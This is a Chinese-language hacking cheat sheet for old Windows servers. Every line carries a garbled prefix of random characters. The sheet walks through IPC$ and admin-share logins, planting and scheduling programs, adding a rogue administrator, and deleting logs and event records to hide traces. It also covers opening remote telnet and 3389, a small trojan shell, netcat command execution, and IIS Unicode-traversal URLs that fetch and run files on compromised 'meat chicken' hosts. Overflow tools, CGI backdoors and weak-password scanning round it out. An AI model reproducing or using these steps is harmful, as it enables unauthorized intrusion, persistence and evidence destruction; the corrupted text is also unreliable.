网管和黑客都必须知道的命令
�Rx|;=-8zg 常用的几条NET命令:
_]*�>*XfF( �R�A�K-UN� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
{�
buy"�X4 +&"zU GTIc (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
}�-3mPy(*% Uv�~QUL3>� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
c{LO6dNg\z ��|B2+�{@R (查看远程主机时间) net time \\IP地址
�P�J'E/C)i Cs�i�fKH�I (定时启动某个程序) at \\IP地址 02:18 readme.exe
A�nv�Rxb.e f�f1c/c�/� (查看共享) net view \\IP地址
�!#"�zT��j ��=4��!e&o (查看netbios工作组列表) nbtstat -A IP地址
C\�/L �v�. O<;3M'�y\ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
0,8�okA�H� vFK<J Sk�! (这两条把自己增加到管理员组): net user 用户名 密码 /add
j9�O�G��\m d&�s�9t;@= net localgroup Administrators 用户名 /add
7(
2{'r�� Y�7[jqb1�D (断开连接) net use \\IP地址\ipc$ /delete
-\n@%$�M]G P_��#bow� 扫尾:
l��?^4!&Nm t>B;�w1�4� del C:\winnt\system32\logfiles\*.*
<kd1Nrr!p� SG�4�%}wn% del C:\winnt\ssytem32\config\*.evt
B�IWW���Mg �[\�b�0Lem del C:\winnt\system32\dtclog\*.*
8&Y�^""#e) M+�9�gL3W� del C:\winnt\system32\*.log
L�`E�Bfz\n �)I�q�<+IJ del C:\winnt\system32\*.txt
� {s{j~�M� w(�TJ*::T� del C:\winnt\*.txt
�QW~1�%�`� x��7x\Y(@ del C:\winnt\*.log
�'�anG�:=� Q�'mM3pq4r 一、netsvc.exe
kd$D 3S�^{ 5�RpjN: �3 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
3�gj+%%!G\ ;?g6�QIN9 netsvc /list \\IP地址
0�tB�0@�Wj ��y%�b�F�& netsvc schedule \\IP地址 /query
yN
�s,Ll�~ Vr1<^�Ib� netsvc \\IP地址 schedule /start
�e2�W".+B1 �r!�a3\ep� 二、OpenTelnet.exe
H_<��C!OgR gH3v�k $WS 远程启动主机的Telnet服务,并绑定端口到7878,例如:
{LQ�#y/�H? �y[�_�Q- � OpenTelnet \\IP地址 用户名 密码 1 7878
h@WhNk7"xa �?r+�����- 然后就可以telnet到主机的7878端口,进入DOS方式下:
{Wu$YWE*sx �yw�3�$2EW telnet IP地址 7878
y�e? �'�Ze c�>~*�/�%+ 三、winshell.exe
,V:SN~P66+ A;|�D:;x3G 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
%zw1}|s#z� ;H.�^i|�_/ p Path (查看winshell主程序的路径信息)
�ZH)="qx�[ &&R�imoIeo b reBoot (重新启动机器)
=;&��yd';k t�=O8f5Pf{ d shutDown (关闭机器)
tWa)���_�y 8r�S:5:�Hi s Shell (执行后你就会看到可爱的“C:\>”)
X�~,a�NR�y } c�}_<�#I x eXit (退出本次登录会话,此命令并不终止winshell的运行)
w+�E,INd�i pKrN:ExB"\ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
58J}{R�e�q #!KE\OI;@5 四、3389登陆器,GUI方式登录远程主机的
YgV8�1�7OV ��1�.9}_4! 五、elsave.exe
4l45N�6�" 6Yx�h9*N~] 事件日志清除工具
z}ddqZ27G$ qF-�@V�25P elsave -s \\IP地址 -l "application" -C
�W=��q�Vc� 7 ��uKY24 elsave -s \\IP地址 -l "system" -C
�`o��8/(`a '>�s�sqBnI elsave -s \\IP地址 -l "security" -C
oVfLn�I�; ��&,�CiM�0 执行后成功清除应用程序日志,系统日志,安全日志
hL;(C�)��( o,�8�T�Dg� 六、hbulot.exe
�><�$�d$�( in�-��HUG� 开启win2kserver和winxp的3389服务
"#�oH�Yz3D dl�@%`E48w hbulot [/r]
ouFYvt�F�g l
+OFw)8od 使用/r表示安装完成后自动重起目标使设置生效。
u=7J�/!H7^ 7.#F,Ue_0T 七、nc.exe(netcat.exe)
QT�X��t�8I \�\dM�y9M- 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
i,4>�0o?�� lun�\`f 5Q 想要连接到某处: nc [-options] hostname port[s] [ports] ...
M={V|�H0� ��<drODj�B 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
8�tFo�N�*M a�^�zibP�G 参数:
MgrLSKL�T $$5aUI:$~$ -e prog 程序重定向,一旦连接,就执行 [危险!!]
c>��Xs��&_ <\ :����Yk -g gateway source-routing hop point[s], up to 8
��g��Ps��i �(l-�ab2�' -G num source-routing pointer: 4, 8, 12, ...
L(-�b@Joh� �_�JE"{ ;� -h 帮助信息
ssRbhlD/*1 E:}r5S)��4 -i secs 延时的间隔
Ww%=1M]e�- nV:Lq�F�=� -l 监听模式,用于入站连接
�OA��kZKG| ~h85BF���5 -n 指定数字的IP地址,不能用hostname
��g8xQ�|px =U|.^5sa#� -o file 记录16进制的传输
VAf1�" )pC Y
M\ K%�rk -p port 本地端口号
z�h�RB,1iG _i|t
Y4�L� -r 任意指定本地及远程端口
�3ojlB��|Z %�<�*g!y ` -s addr 本地源地址
1@�R
Db)<V d>fkA0G/9! -u UDP模式
P}��� S�CF N@�1+O,o�� -v 详细输出——用两个-v可得到更详细的内容
��o�x�koA� 4^~(Mh-�Mw -w secs timeout的时间
O�Fv%�B/O D��\s���WZ -z 将输入输出关掉——用于扫描时
V(6�Z3��g� 八、TFTPD32.EXE
/���1Q(��b Yc�
�`)��R 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
5^l�xj~ �F W$OG(�m!W> http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
s��1NKL�t� K3;n�Y}\>� 然后可以直接令文件运行:
�>�eB\�(EP ~ZEmU�LKkR http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Q[pV�!C�H� Dg?70v��<a 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
JB`\G=PiL .my0|4CQ#@ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
_:C9{aE�Zb �L�Bsl�uT� 一、一 Xscan命令行运行参数说明:
�Vz��~�nT� |�J}�Mgb-4 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�
�L0@SC�t uv(Sdiir�8 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
qA�$*YI�lK b�6F4>@gjg xscan -file <主机列表文件名> <检测项目> [其他选项]
^1�aAjYF�n ReI/]#�Us� 其中<检测项目> 含义如下:
Hp|_6�hO 2 ��4 G-�wd -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�"a"���]o� -VTkG]{`Ir -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
'�BPp ]R#{ 7�MHKe�L�q -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
&LVn6zAba j�eX^}]x|% -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
k_q0Q;6w!l `gb5�"`E�Z -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�ez�^@NK� R_7 d@FQ1� [其他选项] 含义如下:
vI�wCJN1�C :�1^R9yWA4 -v: 显示详细扫描进度
A"D�,Kg
S� b7tOo7a�H) -p: 跳过Ping不通的主机
Upd3-2kr&J w1"n�f�fhO -o: 跳过没有检测到开放端口的主机
�8C~�]��yd g(J&m<��I� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
